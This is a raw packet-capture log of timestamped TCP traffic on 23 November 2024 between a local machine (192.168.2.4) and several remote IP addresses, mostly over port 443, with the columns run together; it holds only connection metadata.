                                                                                                                                                                Nov 23, 2024 20:36:51.306430101 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.307246923 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.307252884 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.408015966 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.408175945 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.408235073 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.408438921 CET49802443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.408459902 CET4434980213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.535391092 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.535444975 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.535528898 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.541151047 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.541224957 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.633539915 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.633732080 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.633913040 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.682640076 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.682697058 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.682714939 CET49803443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.682723045 CET4434980313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.694073915 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.694137096 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.694216967 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.694654942 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.694674969 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.761288881 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.761491060 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.761557102 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.761714935 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.761734009 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.761754036 CET49804443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.761759996 CET4434980413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.768991947 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.769068956 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:51.769144058 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.769366026 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:51.769390106 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:52.965435028 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:52.966188908 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:52.966224909 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:52.966926098 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:52.966937065 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.003773928 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.004195929 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.004225969 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.004745007 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.004750013 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.392159939 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.392709017 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.392740965 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.393333912 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.393340111 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.437752962 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.437908888 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.437980890 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.438064098 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.438081026 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.438091040 CET49807443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.438096046 CET4434980713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.441240072 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.441302061 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.441406965 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.441544056 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.441560030 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.442195892 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.442239046 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.442285061 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.442418098 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.442421913 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.442430973 CET49805443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.442434072 CET4434980513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.444782019 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.444797993 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.444868088 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.444988012 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.444998026 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.499993086 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.500417948 CET49806443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:53.500443935 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.500912905 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.501398087 CET49806443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:53.501480103 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.501676083 CET49806443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:53.528630018 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.529110909 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.529144049 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.529643059 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.529654980 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.543334961 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.566180944 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.566745996 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.566776991 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.567264080 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.567271948 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.876857042 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.877007008 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.877080917 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.877211094 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.877233982 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.877243996 CET49808443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.877249956 CET4434980813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.879650116 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.879697084 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.879774094 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.879905939 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.879921913 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.976361990 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.976531029 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.976610899 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.976676941 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.976707935 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.976732969 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.976747990 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.979091883 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.979110003 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:53.979192972 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.979321003 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:53.979326963 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.020096064 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.020178080 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.020241022 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:54.028152943 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:54.028168917 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.037050962 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:54.037084103 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.037148952 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:54.037280083 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:54.037293911 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.160123110 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.160204887 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:54.160275936 CET49806443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:54.168579102 CET49806443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:54.168597937 CET4434980687.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.199492931 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.200181007 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.200208902 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.200689077 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.200694084 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.269284964 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.269843102 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.269918919 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.270329952 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.270344973 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.640391111 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.640455961 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.640516996 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.640779972 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.640798092 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.640806913 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.640811920 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.643981934 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.644072056 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.644180059 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.644360065 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.644393921 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.673173904 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.673585892 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.673614025 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.674025059 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.674031973 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.716512918 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.716680050 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.716779947 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.716870070 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.716871023 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.716917992 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.716943979 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.719897985 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.719928980 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.720010042 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.720191002 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.720202923 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.788311005 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.788773060 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.788800001 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.789191008 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.789196014 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.948731899 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.949285984 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.949309111 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:55.949824095 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:55.949827909 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.154709101 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.154866934 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.154938936 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.155139923 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.155153990 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.155163050 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.155168056 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.159260035 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.159377098 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.159476042 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.159627914 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.159657955 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.238595009 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.238743067 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.238806963 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.238843918 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.238861084 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.238869905 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.238876104 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.241009951 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.241029024 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.241094112 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.241206884 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.241214037 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.412914991 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.412982941 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.413039923 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.413400888 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.413400888 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.413408041 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.413414001 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.415998936 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.416038036 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:56.416112900 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.416255951 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:56.416269064 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.131571054 CET44349794142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.131711006 CET44349794142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.133986950 CET49794443192.168.2.4142.250.181.100
                                                                                                                                                                Nov 23, 2024 20:36:57.526200056 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.526870012 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.526938915 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.528213024 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.528230906 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.641753912 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.642187119 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.642204046 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.642941952 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.642946005 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.653970957 CET4974880192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:57.654042959 CET49794443192.168.2.4142.250.181.100
                                                                                                                                                                Nov 23, 2024 20:36:57.654055119 CET44349794142.250.181.100192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.779781103 CET804974887.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.779849052 CET4974880192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:57.991208076 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.991262913 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.991344929 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.991553068 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.991600990 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.991628885 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.991661072 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.994995117 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.995074987 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:57.995172024 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.995353937 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:57.995387077 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.016273022 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.016840935 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.016880035 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.017575979 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.017587900 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.027204037 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.027585983 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.027601004 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.028079987 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.028084040 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.100153923 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.100306988 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.100516081 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.100555897 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.100555897 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.100565910 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.100574017 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.103509903 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.103548050 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.103640079 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.103818893 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.103832006 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.159714937 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.160259008 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.160274982 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.160536051 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.160541058 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.506890059 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.507060051 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.507292986 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510452986 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510452986 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510463953 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.510462999 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510473013 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.510510921 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.510605097 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510791063 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.510818005 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.511424065 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.511603117 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.511703968 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.511703968 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.511787891 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.511827946 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.513921976 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.514007092 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.514108896 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.514281034 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.514311075 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.633363008 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.633532047 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:58.633678913 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:58.633708000 CET49820443192.168.2.413.107.246.63
